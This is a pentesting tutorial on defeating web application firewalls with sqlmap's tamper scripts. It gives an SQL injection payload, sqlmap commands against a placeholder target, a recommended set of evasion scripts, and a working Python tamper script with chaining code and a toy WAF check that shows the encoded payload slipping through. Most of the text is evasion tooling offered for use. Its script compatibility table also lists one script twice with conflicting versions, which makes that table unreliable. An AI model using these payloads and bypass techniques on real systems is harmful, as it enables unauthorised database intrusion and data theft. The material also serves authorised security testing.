What is a WAF?

A Web Application Firewall, a.k.a. WAF, acts as a "security guard" that watches what goes in and out of a web app.

It is a filter with a set of rules applied to HTTP traffic; those rules commonly block attacks such as XSS and SQLi before they reach the application.

Having trouble with WAFs?

A WAF is a huge pain in the....brain, especially when it comes to pentesting and performing SQL injection attacks. Cry no more: sqlmap has an option that can get you past many WAFs.

Behold...the --tamper option, along with its tamper scripts.

The role of a tamper script is, as the name implies, to tamper with (modify) each payload before it is sent, so that it no longer matches the detection rules configured in the WAF.

Example:

Our commonly used SQLi payload "1 AND '1'='1" becomes "1 AND %EF%BC%871%EF%BC%87=%EF%BC%871" when the apostrophemask script is used (every apostrophe is replaced by its UTF-8 fullwidth counterpart).

Many WAFs rely on signature-based filtering, so a payload encoded like the one above will often slip past rules that look for a literal apostrophe. Keep in mind that the trick only pays off if the application or database folds the fullwidth character back into a real apostrophe; otherwise the request gets through but the injection never fires.

Here is the list of all the tamper scripts available in sqlmap (Backbox).

tamper scripts in Backbox

I am not sure whether every one of these scripts exists in your standalone sqlmap installation. But worry not, you can download them all from https://github.com/sqlmapproject/sqlmap/tree/master/tamper .

How to use it?

Just like we normally do with our tests, we simply add the --tamper option to the command.

The syntax:

sqlmap -u "targeturl-waf.com/vulnerablepage.php?id=1" --tamper=charencode

To use two or more tamper scripts, separate their names with commas and no spaces (with spaces the shell splits the argument and sqlmap sees stray options):

sqlmap -u "targeturl-waf.com/vulnerablepage.php?id=1" --tamper=charencode,between,equaltolike

Tamper scripts not in default installation?

sqlmap -u "targeturl-waf.com/vulnerablepage.php?id=1" --tamper="tamperscript-dir/charencode.py"
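To make the mechanics concrete, here is an added example (not from the original post and not one of sqlmap's own scripts) of a tamper script in the shape sqlmap expects, the kind of file you would pass by path as shown above. It re-implements apostrophemask as the script's tamper() entry point, adds stand-alone copies of the space2comment and equaltolike logic so the chaining of several scripts can be shown, and runs the results through a constructed signature check standing in for a rule-based WAF. The helper names, the sample payload and the toy signatures are assumptions made for this illustration; the PRIORITY fallback values are assumed too and only their ordering matters.

```python
"""Added example: a sqlmap-style tamper script plus a toy chain and WAF check.
Not part of the original post or of sqlmap; helper names, sample payload and
signatures are constructed for this illustration.
"""
import re
import urllib.parse

try:
    # When sqlmap loads this file, PRIORITY comes from its own package.
    from lib.core.enums import PRIORITY
except ImportError:
    # Stand-alone fallback so the file also runs outside sqlmap
    # (assumed values; only their relative order matters here).
    class PRIORITY:
        LOWEST, LOW, NORMAL, HIGH, HIGHER, HIGHEST = -100, -50, 0, 50, 99, 100

# sqlmap reads this module attribute to order chained scripts.
__priority__ = PRIORITY.LOWEST


def dependencies():
    """sqlmap calls this at load time; real scripts use it to warn about DBMS limits."""
    pass


def apostrophemask(payload, **kwargs):
    """Replace every ASCII apostrophe with its UTF-8 fullwidth counterpart (U+FF07)."""
    if not payload:
        return payload
    # urllib.parse.quote UTF-8-encodes U+FF07 as %EF%BC%87
    return payload.replace("'", urllib.parse.quote("\uff07"))


def tamper(payload, **kwargs):
    """Entry point sqlmap calls for every payload; this script applies apostrophemask."""
    return apostrophemask(payload, **kwargs)


def space2comment(payload, **kwargs):
    """Replace spaces outside single-quoted strings with an inline /**/ comment."""
    out, in_quote = [], False
    for ch in payload:
        if ch == "'":
            in_quote = not in_quote
        out.append("/**/" if ch == " " and not in_quote else ch)
    return "".join(out)


def equaltolike(payload, **kwargs):
    """Rewrite '=' comparisons as LIKE, which some signatures do not look for."""
    return re.sub(r"\s*=\s*", " LIKE ", payload)


def run_chain(payload, scripts):
    """Apply tamper functions left to right, the way --tamper=a,b,c composes them.
    (sqlmap itself additionally sorts the scripts by their __priority__.)"""
    for script in scripts:
        payload = script(payload)
    return payload


# Constructed toy signatures standing in for a signature-based WAF rule set:
# both look for an ASCII apostrophe next to a comparison or boolean keyword.
WAF_SIGNATURES = [
    re.compile(r"'\s*(?:=|like)\s*'", re.I),   # '1'='1  or  '1' LIKE '1
    re.compile(r"\b(?:and|or)\s+'", re.I),     # AND 'x...
]


def naive_waf_blocks(payload):
    """True if the toy WAF would drop the request. Like a real WAF it inspects the
    URL-decoded value, so %EF%BC%87 is seen as U+FF07, which is not an ASCII
    apostrophe and therefore matches neither signature."""
    decoded = urllib.parse.unquote(payload)
    return any(sig.search(decoded) for sig in WAF_SIGNATURES)


if __name__ == "__main__":
    sample = "1 AND '1'='1"   # constructed sample payload, same as in the post
    print("plain     :", sample, "| blocked:", naive_waf_blocks(sample))
    masked = tamper(sample)
    print("masked    :", masked, "| blocked:", naive_waf_blocks(masked))
    # Order matters: equaltolike re-introduces spaces, so it must run before
    # space2comment, otherwise the spaces around LIKE survive uncommented.
    print("good order:", run_chain(sample, [equaltolike, apostrophemask, space2comment]))
    print("bad order :", run_chain(sample, [apostrophemask, space2comment, equaltolike]))
```

Save the file under a name of your choice (say mytamper.py, an assumed name) and point sqlmap at it with --tamper="/path/to/mytamper.py"; sqlmap only requires the tamper() function, the rest is there to show how scripts compose and why the order in a chain matters.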

For general testing, you may start from this blanket set (drop the DBMS- or platform-specific ones once you know the back end, since scripts that do not apply can mangle the payload):
charencode,charunicodeencode,chardoubleencode,apostrophemask,apostrophenullencode,base64encode,space2comment,space2plus,space2randomblank,between,equaltolike,greatest,ifnull2ifisnull,unmagicquotes,multiplespaces,nonrecursivereplacement,percentage,randomcase,unionalltounion

Note: some tamper scripts are written for a specific WAF, web programming language or back-end DBMS. You can do a "hail mary" with all of them, but scripts that do not fit the target may break otherwise valid payloads and affect the result of your test.
For example:
securesphere = Imperva SecureSphere WAF
varnish = Varnish firewall
charunicodeencode = ASP/ASP.NET
equaltolike = PostgreSQL

TAMPER                     MySQL            MSSQL         Oracle   PostgreSQL
apostrophemask             *                *             *        *
apostrophenullencode
appendnullbyte             *                *             *        *
base64encode               4,5,5.5          2005          10g
between                    5.1
bluecoat                   *                *             *        *
apostrophemask             9.0.3            2000,2005              9.3
charunicodeencode          4,5.0 and 5.5    2005          10g      8.3,8.4,9.0
charencode                 *
commalessmid               *
concat2concatws            *                *             *        *
equaltolike                *                *             *        *
greatest                   < 5.1
halfversionedmorekeywords  5.0 and 5.5
ifnull2ifisnull            *                *             *        *
informationschemacomment   4,5.0,5.5        2005          10g      8.3,8.4,9.0
lowercase                  5.0
modsecurityversioned       5.0
modsecurityzeroversioned   *                *             *        *
multiplespaces             *                *             *        *
nonrecursivereplacement    *                *             *        *
overlongutf8               5.1.56,5.5.11    2000, 2005    N/A      9.0
percentage                 4, 5.0,5.5       2005          10g      8.3,8.4,9.0
randomcase                 *                *             *        *
randomcomments             *                *             *        *
securesphere               4,5.0,5.5        2005          10g      8.3,8.4,9.0
space2comment
space2dash                 4.0,5.0
space2hash                 >= 5.1.13
space2morehash                              2000, 2005
space2mssqlblank           *                *
space2mssqlhash            *                *             *        *
space2plus                 4,5.0,5.5        2005          10g      8.3,8.4,9.0
space2randomblank          *
sp_password                *                *             *        *
symboliclogical            *                *             *        *
unionalltounion            *                *             *        *
unmagicquotes              4, 5.0,5.5       2005          10g      8.3,8.4,9.0
uppercase                  *                *             *        *
varnish                    *
versionedkeywords          >=5.1.13
versionedmorekeywords      *                *             *        *
xforwardedfor              *                *             *        *

Table source: http://0xd0m7.blogspot.com/2016/02/understanding-tamper-option-in-sqlmap-ii.html
(*) It might work for all versions.
(-) Does not apply. Cells left blank had no entry in the source table.

SQLMap w/ tamper scripts in ACTION!

Here is what we usually get when testing a WAF-enabled web app.

sqlmap without WAF bypass

Our requests are dropped or the connection keeps timing out; we could wait for hours or days and end up with nothing.

Pause: first verify that the web app really is behind a WAF, using --check-waf, and only then move on to the tamper scripts. (In later sqlmap releases --check-waf and --identify-waf were removed: the WAF/IPS check now runs automatically on the first requests and can be disabled with --skip-waf.)

Here is what happens when tamper scripts are used.

sqlmap with WAF bypass

In some rare cases the result may be a false positive, so recheck and verify its validity, for example by confirming the injection by hand with the tampered payload before reporting it.

References:
https://github.com/sqlmapproject/sqlmap/tree/master/tamper
http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html
http://pentestmonkey.net/blog/exploiting-a-tricky-sql-injection-with-sqlmap
https://www.websec.ca/publication/Blog/Bypassing_WAFs_with_SQLMap
